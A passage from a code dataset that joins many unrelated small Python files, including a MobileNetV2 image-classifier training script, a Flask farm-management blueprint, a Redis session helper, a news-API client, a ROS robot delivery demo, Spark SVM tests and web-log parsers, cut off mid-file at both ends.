train_frac_two_by_zero > test_frac_two_by_zero:\n print('======== decimate two')\n print('test: {}'.format(test_frac_two_by_zero))\n print('train: {}'.format(train_frac_two_by_zero))\n frac = test_frac_two_by_zero / train_frac_two_by_zero\n df_train_two = df_train_two.sample(frac=frac, random_state=42)\n\n return pd.concat([df_train_zero, df_train_one, df_train_two])\n\n\ndef decimate_past_train_data(args, df_train):\n print('======== decimate past_data')\n df_train.sort_index(ascending=True, inplace=True)\n rows = df_train.shape[0]\n divs = 20\n div_number = [i//(rows//divs) for i in range(rows)]\n df_train['div_number'] =div_number\n dfs = []\n for i in range(divs):\n df = df_train[df_train['div_number'] == i]\n if i < int(divs*0.8):\n df = df.sample(frac=(i+1)/divs, random_state=42)\n dfs.append(df)\n df_train_mini = pd.concat(dfs)\n df_train_mini.drop(['div_number'], axis=1, inplace=True)\n return df_train_mini\n","sub_path":"src/prep_data.py","file_name":"prep_data.py","file_ext":"py","file_size_in_byte":4222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"325990723","text":"import argparse\nimport os\n\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom tensorflow.keras.preprocessing import image_dataset_from_directory\n\n\n# Training\n# Padding Convet\ndef import_images(path, IMG_SIZE=(160, 160), visualize=0):\n train_dir = os.path.join(path, \"images\\\\train\")\n validation_dir = os.path.join(path, \"images\\\\validation\")\n\n BATCH_SIZE = 32\n IMG_SIZE = (160, 160)\n\n with tf.device(\"/gpu:0\"):\n train_dataset = image_dataset_from_directory(\n train_dir, shuffle=True, batch_size=BATCH_SIZE, image_size=IMG_SIZE\n )\n\n validation_dataset = image_dataset_from_directory(\n validation_dir, shuffle=True, batch_size=BATCH_SIZE, image_size=IMG_SIZE\n )\n\n val_batches = tf.data.experimental.cardinality(validation_dataset)\n test_dataset = validation_dataset.take(val_batches // 5)\n validation_dataset = validation_dataset.skip(val_batches // 5)\n\n class_names = train_dataset.class_names\n\n if visualize == 1:\n\n 
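# Sketch (added for illustration; hypothetical call from outside this\n        # function, reusing the names defined above): with visualize=1 this block\n        # previews one batch of the training set, e.g.\n        #   train_ds, val_ds, _, test_ds, size = import_images(\"\", visualize=1)\n        #   for images, labels in train_ds.take(1):\n        #       print(images.shape, labels.shape)  # expect (32, 160, 160, 3) (32,)\n        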
plt.figure(figsize=(17, 10))\n for images, labels in train_dataset.take(1):\n for i in range(BATCH_SIZE):\n _ = plt.subplot(4, 8, i + 1)\n plt.imshow(images[i].numpy().astype(\"uint8\"))\n plt.title(class_names[labels[i]])\n plt.axis(\"off\")\n\n print(\"Number of validation batches: %d\" % tf.data.experimental.cardinality(validation_dataset))\n print(\"Number of test batches: %d\" % tf.data.experimental.cardinality(test_dataset))\n\n return train_dataset, validation_dataset, val_batches, test_dataset, IMG_SIZE\n\n\nclass Model:\n def __init__(self, train_dataset, validation_dataset, IMG_SIZE):\n self.train_dataset = train_dataset\n self.validation_dataset = validation_dataset\n\n self.data_augmentation = tf.keras.Sequential(\n [\n tf.keras.layers.experimental.preprocessing.RandomFlip(\"horizontal\"),\n tf.keras.layers.experimental.preprocessing.RandomRotation(0.2),\n tf.keras.layers.experimental.preprocessing.RandomZoom(height_factor=(-0.3, 0)),\n ]\n )\n self.preprocess_input = tf.keras.applications.mobilenet_v2.preprocess_input\n self.rescale = tf.keras.layers.experimental.preprocessing.Rescaling(1.0 / 127.5, offset=-1)\n self.IMG_SHAPE = IMG_SIZE + (3,)\n\n def train(\n self,\n base_learning_rate=0.0001,\n initial_epochs=10,\n fine_tune_epochs=20,\n fine_tune_at=50,\n folder_name=\"trained_model\",\n ):\n base_model = tf.keras.applications.MobileNetV2(\n input_shape=self.IMG_SHAPE, include_top=False, weights=\"imagenet\"\n )\n base_model.trainable = False\n\n image_batch, label_batch = next(iter(self.train_dataset))\n # feature_batch = base_model(image_batch)\n\n global_average_layer = tf.keras.layers.GlobalAveragePooling2D()\n # feature_batch_average = global_average_layer(feature_batch)\n\n prediction_layer = tf.keras.layers.Dense(5, activation=\"softmax\")\n # prediction_batch = prediction_layer(feature_batch_average)\n\n with tf.device(\"/gpu:0\"):\n inputs = tf.keras.Input(shape=(160, 160, 3))\n x = self.data_augmentation(inputs)\n x = self.preprocess_input(x)\n x = base_model(x, training=False)\n x = global_average_layer(x)\n x = tf.keras.layers.Dropout(0.2)(x)\n outputs = prediction_layer(x)\n model = tf.keras.Model(inputs, outputs)\n\n model.compile(\n optimizer=tf.keras.optimizers.Adam(learning_rate=base_learning_rate),\n loss=tf.keras.losses.SparseCategoricalCrossentropy(),\n metrics=[\"accuracy\"],\n )\n # breakpoint()\n self.history = model.fit(self.train_dataset, epochs=initial_epochs, validation_data=self.validation_dataset)\n\n base_model.trainable = True\n\n # Fine-tune from this layer onwards\n # fine_tune_at = 50\n\n # Freeze all the layers before the `fine_tune_at` layer\n for layer in base_model.layers[:fine_tune_at]:\n layer.trainable = False\n\n model.compile(\n loss=tf.keras.losses.SparseCategoricalCrossentropy(),\n optimizer=tf.keras.optimizers.RMSprop(lr=base_learning_rate / 10),\n metrics=[\"accuracy\"],\n )\n\n total_epochs = initial_epochs + fine_tune_epochs\n\n self.history_finetune = model.fit(\n self.train_dataset,\n epochs=total_epochs,\n initial_epoch=self.history.epoch[-1],\n validation_data=self.validation_dataset,\n )\n\n model.save(folder_name)\n\n return model\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Please enter folder name for a saved model.\")\n parser.add_argument(\"--folder_name\", type=str, help=\"Folder name for a trained model\", default=\"trained_model_2\")\n args = parser.parse_args()\n train_dataset, validation_dataset, val_batches, test_dataset, IMG_SIZE = import_images(\"\")\n model = 
Model(train_dataset, validation_dataset, IMG_SIZE)\n    model.train(initial_epochs=1, fine_tune_epochs=1, folder_name=args.folder_name)\n","sub_path":"training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":5342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"475408489","text":"# -*- coding: utf-8 -*-\n\n\nclass TimeMap:\n\n    def __init__(self):\n        \"\"\"\n        Initialize your data structure here.\n        \"\"\"\n        self.dic = {}\n\n    def set(self, key: 'str', value: 'str', timestamp: 'int') -> 'None':\n        if key in self.dic:\n            self.dic[key].append({'v': value, 't': timestamp})\n        else:\n            self.dic[key] = [{'v': value, 't': timestamp}]\n\n    def get(self, key: 'str', timestamp: 'int') -> 'str':\n        if key in self.dic:\n            for kv in reversed(self.dic[key]):\n                if timestamp >= kv['t']:\n                    return kv['v']\n            return \"\"\n        else:\n            return \"\"\n\n# Your TimeMap object will be instantiated and called as such:\n# obj = TimeMap()\n# obj.set(key,value,timestamp)\n# param_2 = obj.get(key,timestamp)\n","sub_path":"algorithms/python-solution/solution/time_based_key_value_store.py","file_name":"time_based_key_value_store.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"229939702","text":"\n\"\"\" Module summary:\nFunctions:\n    farmsShowAll - Show all farms.\n    farmsManage - Show all farms belonging to the current user.\n    farmNew - Create a new farm and add it to the database.\n    farmDelete - Delete an existing farm. \n\"\"\"\n\nfrom flask import Blueprint, render_template, request, redirect, url_for\nfrom flask import flash\nfrom flask import session as login_session\n\nfrom sqlalchemy import asc\n\nfrom secondresponse.database.dbsetup import Farm\nfrom secondresponse.database.dbconnect import db_session\n# imageUploadProfile is assumed to live beside imageDeleteProfile; needNew() below calls it\nfrom secondresponse.views.util import imageDeleteProfile, imageUploadProfile\n\nfrom util import login_required\n\n############################################################################\n\nfarm = Blueprint(\"create\", __name__)\n\n# @farm.route(\"/create\")\n# def create():\n    # farms = db_session.query(Farm).order_by(asc(Farm.name))\n\n    # user_id = login_session.get(\"user_id\")\n    # username = login_session.get(\"username\")\n\n    # return render_template(\"farms.html\",\n                            # farms=farms,\n                            # username=username)\n\n\n# @farm.route(\"/farms/manage\", methods=[\"GET\",\"POST\"])\n# @login_required\n# def farmsManage():\n    # \"\"\"Show all farms belonging to the current user.\"\"\"\n    # user_id = login_session.get(\"user_id\")\n    # username = login_session.get(\"username\")\n    \n    # # If someone is logged in, show them their farms:\n    # user_farms = db_session.query(Farm).filter_by(\n        # user_id=user_id).order_by(asc(Farm.name))\n    # user_farms = [farm for farm in user_farms]\n    # return render_template(\"farmsManage.html\",\n                            # user_farms=user_farms,\n                            # username=username)\n    \n\n@farm.route(\"/create\", methods=[\"GET\",\"POST\"])\n@login_required\ndef needNew():\n    \"\"\"Create a new farm and add it to the database.\"\"\"\n    user_id = login_session.get(\"user_id\")\n    username = login_session.get(\"username\")\n    \n    # Check that the user_id argument matches the login_session user_id.\n    if request.method == \"POST\":\n        if not request.form[\"name\"]:\n            return render_template(\"farmNew.html\",\n                                   name_error=True,\n                                   username=username)\n\n        newFarm = Farm(name = request.form[\"name\"],\n                       location = request.form[\"location\"],\n                       description = request.form[\"description\"],\n                       picture = None,\n                       
user_id=login_session[\"user_id\"])\n db_session.add(newFarm)\n db_session.commit()\n\n picture = request.files[\"picture\"]\n if picture:\n db_session.refresh(newFarm)\n picture_name = imageUploadProfile(farm_id=newFarm.id, file=picture)\n newFarm.picture = picture_name\n db_session.add(newFarm)\n db_session.commit()\n\n flash(\"New Farm %s Successfully Created\" % newFarm.name)\n return redirect(url_for(\"farm.farmsManage\"))\n\n else:\n return render_template(\"farmNew.html\",\n username=username)\n\n return render_template(\"farmNew.html\",\n error=request.files[\"picture\"])\n\n\n@farm.route(\"/farms//delete\", methods=[\"GET\",\"POST\"])\n@login_required\ndef farmDelete(farm_id):\n \"\"\"Delete an existing farm.\"\"\"\n farm = db_session.query(Farm).filter_by(id = farm_id).one()\n\n user_id = login_session.get(\"user_id\")\n username = login_session.get(\"username\")\n\n # Check that the login_session user_id matches the farm user_id:\n if user_id == farm.user_id:\n if request.method == \"POST\":\n if farm.picture:\n imageDeleteProfile(filename=farm.picture)\n\n db_session.delete(farm)\n db_session.commit()\n flash(\"Farm Successfully Deleted: %s\" % (farm.name))\n return redirect(url_for(\"farm.farmsManage\"))\n\n else:\n return render_template(\"farmDelete.html\",\n farm=farm,\n username=username)\n\n else:\n return redirect(url_for(\"catalog.catalogShow\",farm_id=farm_id))\n","sub_path":"secondresponse/views/create.py","file_name":"create.py","file_ext":"py","file_size_in_byte":3916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"342960415","text":"#\n# Imports which are standard for all test cases.\n#\nimport sys\nsys.path.insert(1, \"./\")\nfrom gaiatest import GaiaTestCase\nfrom OWDTestToolkit import *\n\n#\n# Imports particular to this test case.\n#\nfrom tests._mock_data.contacts import MockContacts\n\nclass test_main(GaiaTestCase):\n \n _TestMsg = \"Test message.\"\n \n def setUp(self):\n #\n # Set up child objects...\n #\n GaiaTestCase.setUp(self)\n self.UTILS = UTILS(self)\n self.messages = Messages(self)\n self.contacts = Contacts(self)\n \n self.num1 = self.UTILS.get_os_variable(\"GLOBAL_TARGET_SMS_NUM\")\n self.emailAddy = self.UTILS.get_os_variable(\"GMAIL_1_EMAIL\")\n \n self.UTILS.addFileToDevice('./tests/_resources/contact_face.jpg', destination='DCIM/100MZLLA')\n \n self.cont = MockContacts().Contact_multipleEmails\n self.data_layer.insert_contact(self.cont)\n \n def tearDown(self):\n self.UTILS.reportResults()\n \n def test_run(self):\n #\n # Launch messages app.\n #\n self.messages.launch()\n \n #\n # Make sure we have no threads (currently blocked - use _RESTART_DEVICE instead).\n #\n# self.messages.deleteAllThreads()\n \n #\n # Create and send a new test message.\n #\n self.messages.createAndSendSMS([self.num1], \"Hello \" + self.emailAddy + \" old bean.\")\n x = self.messages.waitForReceivedMsgInThisThread()\n \n #\n # Long press the email link.\n #\n _link = x.find_element(\"tag name\", \"a\")\n self.actions = Actions(self.marionette)\n self.actions.long_press(_link,2).perform()\n \n #\n # Click 'Add to an existing contact'.\n #\n x = self.UTILS.getElement( (\"xpath\", \"//button[text()='Add to an existing contact']\"),\n \"Create new contact button\")\n x.tap()\n \n #\n # Verify that the email is in the email field.\n #\n self.UTILS.switchToFrame(*DOM.Contacts.frame_locator)\n x = self.UTILS.getElement( (\"xpath\", \"//p[@data-order='%s']\" % self.cont[\"name\"].replace(\" \", \"\")),\n \"Search 
item\")\n x.tap()\n \n self.UTILS.waitForElements((\"xpath\",\"//input[@type='email' and @value='%s']\" % self.emailAddy), \"New email address\")\n \n #\n # Add gallery image.\n #\n self.contacts.addGalleryImageToContact(0)\n\n \n #\n # Press the Update button.\n #\n done_button = self.UTILS.getElement(DOM.Contacts.edit_update_button, \"'Update' button\")\n done_button.tap()\n\n #\n # Check that the contacts iframe is now gone.\n #\n self.marionette.switch_to_frame()\n self.UTILS.waitForNotElements( (\"xpath\", \"//iframe[contains(@src,'contacts')]\"),\n \"Contact app iframe\")\n \n #\n # Now return to the SMS app.\n #\n self.UTILS.switchToFrame(*DOM.Messages.frame_locator)","sub_path":"tests/SMS/test_26973.py","file_name":"test_26973.py","file_ext":"py","file_size_in_byte":3116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"575695154","text":"import redis\nimport settings\n\n\n\n\n\nredis_client = redis.Redis(db=1)\n\n\nclass Session(object):\n\n @classmethod\n def new(cls, account, expire=60*60):\n if account:\n key = settings.SESSION_NAME.format(account)\n redis_client.setex(key, account, expire)\n return str(account)\n\n @classmethod\n def rm(cls, account):\n key = settings.SESSION_NAME.format(account)\n if key:\n redis_client.delete(key)\n\n @classmethod\n def account_by_cookie(cls, cookie):\n if cookie:\n key = settings.SESSION_NAME.format(cookie)\n if redis_client.get(key):\n return str(cookie)\n else:\n return False\n else:\n return False\n","sub_path":"session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"195268528","text":"\"\"\"3.\tWrite a program to accept 2 different numbers from the user and print all the prime numbers from the user and print all the prime numbers.\"\"\"\r\n\r\ndef is_prime(num):\r\n if num<2:\r\n return False\r\n for i in range(2,num//2+1):\r\n if num%i==0:\r\n return False\r\n return True\r\nLB=int(input(\"enter lower bound\"))\r\nUB=int(input(\"enter upper bound\"))\r\nfor i in range(LB,UB+1):\r\n if is_prime(i):\r\n print(i)\r\n\r\n","sub_path":"ASSIGNMENT_PYTHON/M1/Q3.py","file_name":"Q3.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"91018225","text":"#!/usr/bin/python\r\nfile = open(\"Divisor_exercise.txt\")\r\ntext = file.read()\r\nsplittext = text.split(\"\\n\")\r\nfout=open('Divisors', 'wt')\r\nfor item in splittext[1:-1]:\r\n divisors = []\r\n for i in range(2, (int(item)-1), 1):\r\n if int(item) % i == 0:\r\n i=str(i)\r\n divisors.append(i)\r\n if len(divisors)==0:\r\n fout.write(item + \" is a prime.\\n\")\r\n else:\r\n divisors_strings=\",\".join(divisors)\r\n fout.write(\"Divisors of \" + item + \": \" + divisors_strings + \"\\n\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Assignments/Assignment4.py","file_name":"Assignment4.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"160279890","text":"#!/usr/bin/env python\nimport rospy\nimport robot_eup\nfrom robot_eup.msg import RobotType\n\n#############################################\n\ndef main_loop(robot):\n\n robot.display_message(\n message='Hello, my name is Chester. 
Please put A, B, and C.',\n duration=3)\n choice = robot.ask_choice(\n message='Where should I deliver?',\n choices=['A', 'B', 'C',])\n robot.say(text='Now, I will deliver to you.')\n if choice == 'A':\n robot.move(x=0.5, y=0.0, theta=0.75, duration=4)\n robot.say(text='Take delivery.')\n robot.move(x=0.0, y=0.0, theta=0.0, duration=4)\n elif choice == 'B':\n robot.move(x=1.0, y=2.0, theta=-0.75, duration=4)\n robot.say(text='Take delivery.')\n robot.move(x=0.0, y=0.0, theta=0.0, duration=4)\n elif choice == 'C':\n robot.move(x=0.0, y=-2.0, theta=2.0, duration=4)\n robot.say(text='Take delivery.')\n robot.move(x=0.0, y=0.0, theta=0.0, duration=4)\n else:\n robot.say('I could not hear you.')\n\n\n#############################################\n\nif __name__ == '__main__':\n rospy.init_node('robot_eup_delivery')\n robot = robot_eup.RobotFactory().build(RobotType.TURTLEBOT)\n robot.start_robot()\n while not rospy.is_shutdown():\n main_loop(robot)\n","sub_path":"robot_eup_samples/scripts/workshop/delivery_sangha.py","file_name":"delivery_sangha.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"171675937","text":"import shutil\nimport tempfile\nimport numpy as np\nimport scipy.sparse as sp\n\nfrom numpy.testing import assert_array_almost_equal\n\nfrom sklearn.datasets import make_classification\nfrom sklearn.svm import LinearSVC\n\nfrom common import SplearnTestCase\nfrom splearn.rdd import ArrayRDD, TupleRDD\nfrom splearn.svm import SparkLinearSVC\n\n\nclass SVMClassesTestCase(SplearnTestCase):\n\n def setUp(self):\n super(SVMClassesTestCase, self).setUp()\n self.outputdir = tempfile.mkdtemp()\n\n def tearDown(self):\n super(SVMClassesTestCase, self).tearDown()\n shutil.rmtree(self.outputdir)\n\n def generate_dataset(self, classes, samples, blocks=None):\n X, y = make_classification(n_classes=classes,\n n_samples=samples, n_features=5,\n n_informative=4, n_redundant=0,\n n_clusters_per_class=1,\n random_state=42)\n\n X_rdd = self.sc.parallelize(X)\n y_rdd = self.sc.parallelize(y)\n\n Z = TupleRDD(X_rdd.zip(y_rdd), blocks)\n\n return X, y, Z\n\n\nclass TestLinearSVC(SVMClassesTestCase):\n\n def test_same_coefs(self):\n X, y, Z = self.generate_dataset(2, 100000)\n\n local = LinearSVC()\n dist = SparkLinearSVC()\n\n local.fit(X, y)\n dist.fit(Z, classes=np.unique(y))\n\n assert_array_almost_equal(local.coef_, dist.coef_, decimal=4)\n","sub_path":"python/test/test_svm_classes.py","file_name":"test_svm_classes.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"118289046","text":"\nimport urllib.request,json\nfrom .models import Source, Article\n\n\n# Getting the API key, base url and article base url\napi_key = None\nbase_url = None\narticle_base_url = None\n\ndef configure_request(app):\n global api_key,base_url, article_base_url\n api_key = app.config['NEWS_API_KEY']\n base_url = app.config['NEWS_API_BASE_URL']\n article_base_url = app.config['ARTICLES_API_BASE_URL']\n\ndef get_sources():\n '''\n Function that gets the json response to our url request\n '''\n get_sources_url = base_url.format(api_key)\n # print(get_sources_url)\n with urllib.request.urlopen(get_sources_url) as url:\n get_sources_data = url.read()\n get_sources_response = json.loads(get_sources_data)\n\n sources_results = None\n\n if get_sources_response['sources']:\n sources_results_list = get_sources_response['sources']\n 
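# Illustrative shape of one entry (assumed from the .get() calls in\n        # process_results below; values are hypothetical, not from the API docs):\n        #   {'id': 'bbc-news', 'name': 'BBC News', 'description': '...',\n        #    'url': 'http://www.bbc.co.uk/news', 'language': 'en', 'country': 'gb'}\n        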
sources_results = process_results(sources_results_list)\n\n\n    return sources_results\n\n\ndef get_source(id):\n    get_source_details_url = base_url.format(id,api_key)\n\n    with urllib.request.urlopen(get_source_details_url) as url:\n        source_details_data = url.read()\n        source_details_response = json.loads(source_details_data)\n\n        source_object = None\n        if source_details_response:\n            id = source_details_response.get('id')\n            name = source_details_response.get('name')\n            description = source_details_response.get('description')\n            url = source_details_response.get('url')\n            language = source_details_response.get('language')\n            country = source_details_response.get('country')\n\n            source_object = Source(name, description, url, language, country)\n\n\n    return source_object\n\ndef process_results(sources_list):\n    '''\n    Transforms the source results into a list of objects\n\n    Args:\n        sources_list = a list of dictionaries that contain source details\n\n    Returns:\n        sources_results\n    '''\n\n    sources_results = []\n    for source in sources_list:\n        name = source.get('name')\n        description = source.get('description')\n        url = source.get('url')\n        language = source.get('language')\n        country = source.get('country')\n\n        if url:\n            source_object = Source(name, description, url, language, country)\n            sources_results.append(source_object)\n\n    return sources_results\n\ndef get_articles(query):\n    '''\n    Function that gets the json response to our url request\n    '''\n    get_articles_url = article_base_url.format(query,api_key)\n    # print(get_sources_url)\n    with urllib.request.urlopen(get_articles_url) as url:\n        get_articles_data = url.read()\n        get_articles_response = json.loads(get_articles_data)\n\n    articles_results = None\n\n    if get_articles_response['articles']:\n        articles_results_list = get_articles_response['articles']\n        articles_results = process_article_results(articles_results_list)\n\n\n    return articles_results\n\n\n\n\ndef process_article_results(article_list):\n    '''\n    Function that processes the articles result and transforms it into a list of objects\n\n    Args:\n        article_list: A list of dictionaries that contain articles' details\n\n    Returns :\n        articles_results: A list of article objects\n    '''\n    articles_results = []\n    for article_item in article_list:\n        author = article_item.get('author')\n        title = article_item.get('title')\n        description = article_item.get('description')\n        url = article_item.get('url')\n        urlToImage = article_item.get('urlToImage')\n        publishedAt = article_item.get('publishedAt')\n\n        if urlToImage:\n            article_object = Article(author, title, description, url, urlToImage,publishedAt)\n            articles_results.append(article_object)\n\n    return articles_results\n","sub_path":"app/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":3859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"39204144","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Oct 10 11:23:49 2018\n\ngravityLine\n\n@author: xzhang\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport func as F\n\n#==============================================================================#\ndata = np.loadtxt('cavity01.csv',dtype='float',delimiter=', ')\nvinlet=15.0\nxMax = 1.6\nfigName = 'gravityLine01.PNG'\nxxStep = 0.035\n#==============================================================================#\ndata = data.transpose()\ndata = np.delete(data,1,0)\ndata = data.T[np.lexsort(data[::-1,:])].T #sort in terms of the x\nx = -data[0][::-1] #set x to positive\nz = 
data[1][::-1]\ndataDict = dict(zip(x,z)) #x:z dictionary\nzLowerDict = {} #dictionary{xx:zLower}\nzUpperDict = {} #dictionary{xx:zUpper}\n\n\n#------|------|-------|------|------|------|-------|------|------|------|------#\nxx = np.arange(0.0,xMax,xxStep)\n#group z into upper and lower dictionary\nfor xxIter in xx:\n    zUL = np.array([])\n    for xIter in x:\n        if ((xIter>=xxIter) and (xIter<=xxIter+xxStep)):\n            zUL = np.append(zUL,dataDict[xIter])\n    zLowerDict[xxIter] = min(zUL)\n    zUpperDict[xxIter] = max(zUL)\n#------|------|-------|------|------|------|-------|------|------|------|------#\n\n\n#gamma(x): (g/(pi*v**2))*integrate(vol/r,0,x)\ndef gamma(x):\n    gamma0=0.0\n    for xIndex in np.arange(0,len(xx)-1,1):\n        if xx[xIndex] >= x:\n            break\n        else: #central difference\n            vol1=F.volx(xx[xIndex],xx,zLowerDict,zUpperDict,xxStep)\n            vol2=F.volx(xx[xIndex+1],xx,zLowerDict,zUpperDict,xxStep)\n            vol = 0.5*vol1+0.5*vol2\n            r1=F.rx(xx[xIndex],zLowerDict,zUpperDict,xxStep)\n            r2=F.rx(xx[xIndex+1],zLowerDict,zUpperDict,xxStep)\n            r = 0.5*r1+0.5*r2\n            gamma0 += (9.81/(np.pi*vinlet*vinlet))*(vol/(r*r))*xxStep\n    return gamma0\n\n#xx to gamma(xx)\ndef x2gamma(xx):\n    g = np.array([])\n    for x0 in xx:\n        g = np.append(g,gamma(x0))\n    return g\n\n#xx to r(xx)\ndef x2r(xx): #calculate radius\n    r = np.array([])\n    for x0 in xx:\n        r = np.append(r,F.rx(x0,zLowerDict,zUpperDict,xxStep))\n    return r\n\n\n#middle line\nzMid = np.array([])\nfor xIndex in np.arange(0,len(xx),1):\n    z = 0.5*zUpperDict[xx[xIndex]]+0.5*zLowerDict[xx[xIndex]]\n    zMid = np.append(zMid,z)\n\n#-------------------------------------------------------------------------------\nplt.figure(figsize=(14,6))\n#plt.scatter(xx,x2r(xx)) #plot radius\n#plt.scatter(x,z)\nplt.scatter(xx,F.x2z(xx,zLowerDict),c='k')\nplt.scatter(xx,F.x2z(xx,zUpperDict),c='k')\nplt.scatter(xx,zMid,c='b')\nplt.plot(xx,x2gamma(xx),c='r')\nplt.savefig(figName, dpi=500) \nplt.show()\n#-------------------------------------------------------------------------------\n","sub_path":"GravityLine/gravityLine.py","file_name":"gravityLine.py","file_ext":"py","file_size_in_byte":2721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"136447532","text":"import calendar\nfrom datetime import datetime\nimport fnmatch\nimport json\nimport logging\nimport os\nimport re\n\nimport slurp\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass AccessParser(slurp.EventParser):\n\n    IP = r'(?P<ip>\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}) -'\n    USER = r'(?P<user>.+)'\n    DATE = r'(?P<day>\d{2})\/(?P<month>\w{3})\/(?P<year>\d{4})'\n    TIME = r'(?P<hour>\d{2}):(?P<min>\d{2}):(?P<sec>\d{2})'\n    TIMESTAMP = r'\[' + DATE + ':' + TIME + r'\]'\n    RESOURCE = r'\"((?P<method>\w+) (?P<uri>.+) HTTP\/(?P<version>\d\.\d)|-)\"'\n    STATUS = r'(?P<status>\w+)'\n    BYTES = r'(?P<bytes>\d+)'\n    REFERRER = r'\"(?P<referrer>.*?)\"'\n    USER_AGENT = r'\"(?P<user_agent>.+?)\"'\n\n    PATTERN = ' '.join([\n        IP, USER, TIMESTAMP, RESOURCE, STATUS, BYTES, REFERRER, USER_AGENT])\n    RE = re.compile(PATTERN)\n\n    BLOCK_TERMINAL = '\\n'\n\n    MONTHS = dict((calendar.month_abbr[i], i) for i in range(1, 13))\n\n    def __call__(self, src_file, offset_b, offset_e, raw):\n        tag = os.path.splitext(os.path.basename(src_file))[0]\n        match = self.RE.match(raw)\n        if not match:\n            raise ValueError('Unable to parse event from %s[%s:%s]' %\n                             (src_file, offset_b, offset_e))\n        ip = match.group('ip')\n        timestamp = datetime(\n            year=int(match.group('year')),\n            month=self.MONTHS[match.group('month')],\n            day=int(match.group('day')),\n            hour=int(match.group('hour')),\n            minute=int(match.group('min')),\n            
second=int(match.group('sec')))\n        user = match.group('user')\n        if user == '-':\n            user = None\n        method = match.group('method')\n        uri = match.group('uri')\n        version = match.group('version')\n        status = int(match.group('status'))\n        severity = 'error' if status >= 500 else 'info'\n        bytes = int(match.group('bytes'))\n        referrer = match.group('referrer')\n        if referrer == '-':\n            referrer = None\n        user_agent = match.group('user_agent')\n        event = {\n            'src_file': src_file,\n            'offset_b': offset_b,\n            'offset_e': offset_e,\n            'tag': tag,\n            'severity': severity,\n            'timestamp': timestamp,\n            'payload': {\n                'ip': ip,\n                'user': user,\n                'method': method,\n                'uri': uri,\n                'version': version,\n                'status': status,\n                'bytes': bytes,\n                'referrer': referrer,\n                'user_agent': user_agent,\n                },\n            }\n        return event\n\n\nclass ErrorParser(slurp.EventParser):\n\n    DATE = r'(?P<year>\d{4})-(?P<month>\d{2})-(?P<day>\d{2})'\n    TIME = r'(?P<hour>\d{2}):(?P<min>\d{2}):(?P<sec>\d{2})\,(?P<usec>\d{3})'\n    TIMESTAMP = DATE + ' ' + TIME\n    SEVERITY = r'(?P<severity>\w+)'\n    CHANNEL = r'(?P<channel>.+?)'\n    PROCESS = r'.+?'\n    THREAD = r'.+?'\n    MESSAGE = r'(?P<message>.*)'\n\n    PATTERN = ' : '.join([\n        TIMESTAMP, SEVERITY, CHANNEL, PROCESS, THREAD, MESSAGE])\n    RE = re.compile(PATTERN, flags=re.DOTALL)\n\n    BLOCK_TERMINAL = '\\n'\n    BLOCK_PREAMBLE_PATTERN = ' : '.join([TIMESTAMP, SEVERITY, CHANNEL])\n    BLOCK_PREAMBLE_RE = re.compile(BLOCK_PREAMBLE_PATTERN)\n\n    def __call__(self, src_file, offset_b, offset_e, raw):\n        tag = os.path.splitext(os.path.basename(src_file))[0]\n        match = self.RE.match(raw)\n        if not match:\n            raise ValueError('Unable to parse event from %s[%s:%s]' %\n                             (src_file, offset_b, offset_e))\n        timestamp = datetime(\n            year=int(match.group('year')),\n            month=int(match.group('month')),\n            day=int(match.group('day')),\n            hour=int(match.group('hour')),\n            minute=int(match.group('min')),\n            second=int(match.group('sec')),\n            microsecond=int(match.group('usec')))\n        event = {\n            'src_file': src_file,\n            'offset_b': offset_b,\n            'offset_e': offset_e,\n            'tag': tag,\n            'severity': match.group('severity').lower(),\n            'timestamp': timestamp,\n            'payload': {\n                'channel': match.group('channel'),\n                'message': match.group('message'),\n                },\n            }\n        return event\n\n\nclass SyslogParser(slurp.EventParser):\n\n    FACILITY = r'(?P<facility>\d+)'\n    SEVERITY = r'(?P<severity>\w+)'\n    PREFIX = r'<' + FACILITY + r'\.' 
